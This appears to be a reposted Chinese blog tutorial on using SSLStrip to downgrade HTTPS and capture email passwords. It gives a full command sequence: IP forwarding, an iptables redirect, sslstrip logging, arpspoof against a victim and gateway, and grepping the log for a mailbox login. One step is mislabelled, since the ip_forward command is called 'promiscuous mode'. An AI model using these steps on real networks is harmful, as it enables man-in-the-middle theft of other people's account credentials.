利用SSLStrip截获https协议--抓取邮箱等密码
1、SSL解析
SSL 是 Secure Socket Layer 的简称, 中文意思是安全套接字层,由 NetScape公司所开发,用以保障在 Internet 上数据传输的安全,确保数据在网络的传输过程中不会被截取和窃听。
SSL 协议提供的服务主要有:
(1)认证用户和服务器,确保数据发送到正确的客户和服务器。
(2)加密数据以防止数据中途被窃取。
(3)维护数据的完整性,确保数据在传输过程中不被改变。
2、SSLStrip
SSLStrip 的工作原理及步骤如下:
(1) 先进行中间人攻击来拦截 HTTP 流量。
(2) 将出现的 HTTPS 链接全部替换为 HTTP,同时记下所有改变的链接。
(3) 使用 HTTP 与受害者机器连接。
(4) 同时与合法的服务器建立 HTTPS。
(5) 受害者与合法服务器之间的全部通信经过了代理转发。
(6) 其中,出现的图标被替换成为用户熟悉的“小黄锁”图标,以建立信任。
(7) 这样,中间人攻击就成功骗取了密码、账号等信息,而受害者一无所知。
注:下载地址:http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
3、SSLStrip进行攻击
测试环境:攻击机(kali)+受害机(随意)
攻击者:
启动网卡混杂模式:echo "1">/proc/sys/net/ipv4/ip_forward
添加防火墙规则:iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 9527
-t:制定命令要操作的匹配包的表
-A:在选择的链末添加规则
-p:制定协议
--dport:制定端口
-j:目标跳转
开启SSLStrip:python sslstrip.py -a -l 9527 -w sslstrip.log
-a:记录所有来自服务器的ssl和Http数据流量内容;
-l:监听端口
-w:保存文件
开启arp欺骗:arpspoof -i eth0 -t 192.168.133.130(受害机) 192.168.133.2(网关)
受害机登陆126邮箱
攻击者查看日志:cat sslstrip.log | grep "邮箱名"
据说打了码可以去掉,这里就不上图了~~~~
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。